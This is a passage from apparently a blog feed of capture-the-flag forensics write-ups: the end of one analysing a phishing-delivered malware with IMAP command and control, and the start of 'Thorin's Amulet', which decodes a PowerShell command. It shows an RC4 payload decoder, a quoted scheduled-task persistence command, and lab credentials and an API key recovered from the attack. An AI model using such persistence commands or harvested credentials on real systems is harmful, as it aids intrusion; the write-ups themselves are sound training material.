class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>5. Decoding the Attacker's Commands</strong></p><p>Used the following <strong>Python script</strong> to decode Base64 + RC4 payloads:</p><p># RC4 Decoder<br>import base64</p><p>def rc4(key, data):<br> S = list(range(256))<br> j = 0<br> out = bytearray()<br> for i in range(256):<br> j = (j + S[i] + key[i % len(key)]) % 256<br> S[i], S[j] = S[j], S[i]<br> i = j = 0<br> for byte in data:<br> i = (i + 1) % 256<br> j = (j + S[i]) % 256<br> S[i], S[j] = S[j], S[i]<br> out.append(byte ^ S[(S[i] + S[j]) % 256])<br> return bytes(out)</p><p>b64_data = """&lt;PASTE_B64_PAYLOAD_HERE&gt;"""<br>key = bytes([...]) # Hardcoded RC4 key from dotPeek</p><p>data = base64.b64decode(b64_data)<br>decrypted = rc4(key, data)</p><p>print(decrypted.decode(errors="ignore"))</p><p><strong>6. Questions &amp; Answers</strong></p><p><strong>Question 1:</strong></p><p><strong>What is the subject of the first email that the victim opened and replied to?</strong></p><p>Answer: Found in extracted .eml HTML file found in /AssembledFiles. Please note that these files are dumped when you upload pcap into networkminer.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uyEF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uyEF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png 424w, https://substackcdn.com/image/fetch/$s_!uyEF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png 848w, https://substackcdn.com/image/fetch/$s_!uyEF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png 1272w, https://substackcdn.com/image/fetch/$s_!uyEF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uyEF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png" width="303" height="32" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cd977b04-3850-4a55-8fce-e359d96221d8_303x32.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:32,&quot;width&quot;:303,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uyEF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png 424w, https://substackcdn.com/image/fetch/$s_!uyEF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png 848w, https://substackcdn.com/image/fetch/$s_!uyEF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png 1272w, https://substackcdn.com/image/fetch/$s_!uyEF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd977b04-3850-4a55-8fce-e359d96221d8_303x32.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Question 2:</strong></p><p><strong>On what date and time was the suspicious email sent? (Format: YYYY-MM-DD_HH:MM)</strong></p><p>Answer: Found in email headers via NetworkMiner. Found again in an html file</p><p><strong>Question 3:</strong></p><p><strong>What is the MD5 hash of the malware file?</strong></p><p>Answer: Uploaded disguised .exe to <strong>VirusTotal</strong> to obtain hash.</p><p><strong>Question 4:</strong></p><p><strong>What credentials were used to log into the attacker's mailbox? (Format: username:password)</strong></p><p>proplayer@email.com:completed Found in decompiled source code (Program.creds)</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BmPi!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BmPi!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png 424w, https://substackcdn.com/image/fetch/$s_!BmPi!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png 848w, https://substackcdn.com/image/fetch/$s_!BmPi!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png 1272w, https://substackcdn.com/image/fetch/$s_!BmPi!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BmPi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png" width="1090" height="157" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:157,&quot;width&quot;:1090,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BmPi!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png 424w, https://substackcdn.com/image/fetch/$s_!BmPi!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png 848w, https://substackcdn.com/image/fetch/$s_!BmPi!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png 1272w, https://substackcdn.com/image/fetch/$s_!BmPi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F81d36a04-63f9-40b7-a8a1-7528bce2f832_1090x157.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Question 5:</strong></p><p><strong>What is the name of the task scheduled by the attacker?</strong></p><p>Synchronization Found in decoded email: schtasks /create /tn Synchronization &#8230;</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!kk2Z!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!kk2Z!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png 424w, https://substackcdn.com/image/fetch/$s_!kk2Z!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png 848w, https://substackcdn.com/image/fetch/$s_!kk2Z!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png 1272w, https://substackcdn.com/image/fetch/$s_!kk2Z!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!kk2Z!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png" width="1090" height="79" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:79,&quot;width&quot;:1090,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!kk2Z!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png 424w, https://substackcdn.com/image/fetch/$s_!kk2Z!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png 848w, https://substackcdn.com/image/fetch/$s_!kk2Z!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png 1272w, https://substackcdn.com/image/fetch/$s_!kk2Z!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb6eaf7cf-f9c4-4e48-ab59-ae6e6f7e7baf_1090x79.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Question 6:</strong></p><p><strong>What is the API key leaked from the highly valuable file discovered by the attacker?</strong></p><p>sk-3498fwe09r8fw3f98fw9832fw Found in credentials.txt dumped from the infected host</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!M1f8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!M1f8!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png 424w, https://substackcdn.com/image/fetch/$s_!M1f8!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png 848w, https://substackcdn.com/image/fetch/$s_!M1f8!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png 1272w, https://substackcdn.com/image/fetch/$s_!M1f8!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!M1f8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png" width="545" height="324" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:324,&quot;width&quot;:545,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!M1f8!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png 424w, https://substackcdn.com/image/fetch/$s_!M1f8!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png 848w, https://substackcdn.com/image/fetch/$s_!M1f8!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png 1272w, https://substackcdn.com/image/fetch/$s_!M1f8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F27a31890-6d05-44e2-b24e-9067be93fb58_545x324.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>7. Summary</strong></p><p>The attack leveraged:</p><ul><li><p>Phishing email (.eml) containing a disguised malware executable.</p></li><li><p>A stealthy persistence mechanism via scheduled tasks.</p></li><li><p>IMAP-based command and control.</p></li></ul><p>By performing detailed network forensics, static malware analysis, and RC4 decoding, we were able to uncover:</p><ul><li><p>The initial infection vector</p></li><li><p>Attacker persistence</p></li><li><p>C2 communication</p></li><li><p>Leaked credentials and API keys</p></li></ul><p>This investigation reveals the depth of compromise caused by Malakar and how the attacker silently trapped users within the Eldoria ecosystem.</p><p><strong>Status: Restored. Game and system integrity can now be recovered.</strong></p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Thorins Amulet]]></title><description><![CDATA[Cyber Apocalypse 2025]]></description><link>https://www.byteberzerker.com/p/hackthebox-thorins-amulet</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-thorins-amulet</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Fri, 21 Mar 2025 21:30:57 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!MPFl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Thorin&#8217;s Amulet - Forensics Challenge Write-Up</strong></p><p><strong>Challenge Overview</strong></p><p>Garrick and Thorin&#8217;s visit to Stonehelm took an unexpected turn when Thorin&#8217;s old rival, Bron Ironfist, challenged him to a forging contest. Thorin emerged victorious with a beautifully engineered clockwork amulet, but before he could celebrate, saboteurs stole the amulet and left behind digital footprints. Our goal is to analyze the provided evidence, reconstruct what happened, and retrieve the flag!</p><p><strong>&#128295; Step 1: Download and Set Up the Environment</strong></p><ol><li><p><strong>Download the challenge file and start the Docker instance.</strong></p></li></ol><ol><li><p>Once the <strong>Docker instance is running</strong>, make note of its IP address. We&#8217;ll need to <strong>add this IP to the hosts file</strong> so we can interact with the challenge domain (korp.htb).</p></li></ol><p><strong>&#128421;&#65039; Step 2: Adding korp.htb to the Hosts File (Windows)</strong></p><p>Since the challenge specifies <strong>korp.htb</strong>, we must manually map this hostname to our Docker instance IP.</p><p><strong>Steps to Modify Hosts File:</strong></p><ol><li><p><strong>Open Notepad as Administrator:</strong></p><ul><li><p><strong>Press Start, search for Notepad.</strong></p></li><li><p><strong>Right-click Notepad &#8594; Select Run as administrator.</strong></p></li><li><p><strong>Accept the UAC prompt.</strong></p></li></ul></li><li><p><strong>Open the hosts file:</strong></p><ul><li><p><strong>Click File &#8594; Open.</strong></p></li><li><p><strong>Navigate to: C:\Windows\System32\drivers\etc</strong></p></li><li><p><strong>Change file type to All Files (*.*) &#8594; Select hosts.</strong></p></li></ul></li><li><p><strong>Add an entry at the bottom of the file: <br>[Docker-IP] korp.htb</strong></p><ul><li><p><strong>Replace [Docker-IP] with your actual Docker instance IP.</strong></p></li></ul></li><li><p><strong>Save &amp; Close Notepad.</strong></p></li></ol><p><strong>&#9989; Verify</strong></p><p>Open <strong>Command Prompt</strong> and run:</p><p>ping korp.htb</p><p>If it resolves to the <strong>Docker IP</strong>, your setup is working!</p><p><strong>&#128220; Step 3: Inspecting the Downloaded File</strong></p><p>We find a <strong>PowerShell script</strong> with an <strong>encoded command</strong>. Let's decode it!</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!u08E!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!u08E!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png 424w, https://substackcdn.com/image/fetch/$s_!u08E!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png 848w, https://substackcdn.com/image/fetch/$s_!u08E!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png 1272w, https://substackcdn.com/image/fetch/$s_!u08E!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!u08E!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png" width="1350" height="179" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:179,&quot;width&quot;:1350,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!u08E!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png 424w, https://substackcdn.com/image/fetch/$s_!u08E!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png 848w, https://substackcdn.com/image/fetch/$s_!u08E!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png 1272w, https://substackcdn.com/image/fetch/$s_!u08E!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ad8823c-a215-46fc-8be9-624db88d4b25_1350x179.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Decoding the Command</strong></p><p>We can use <strong>CyberChef</strong> to decode the Base64-encoded PowerShell command.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MPFl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MPFl!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png 424w, https://substackcdn.com/image/fetch/$s_!MPFl!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png 848w, https://substackcdn.com/image/fetch/$s_!MPFl!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png 1272w, https://substackcdn.com/image/fetch/$s_!MPFl!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MPFl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png" width="882" height="606" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:606,&quot;width&quot;:882,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MPFl!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png 424w, https://substackcdn.com/image/fetch/$s_!MPFl!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png 848w, 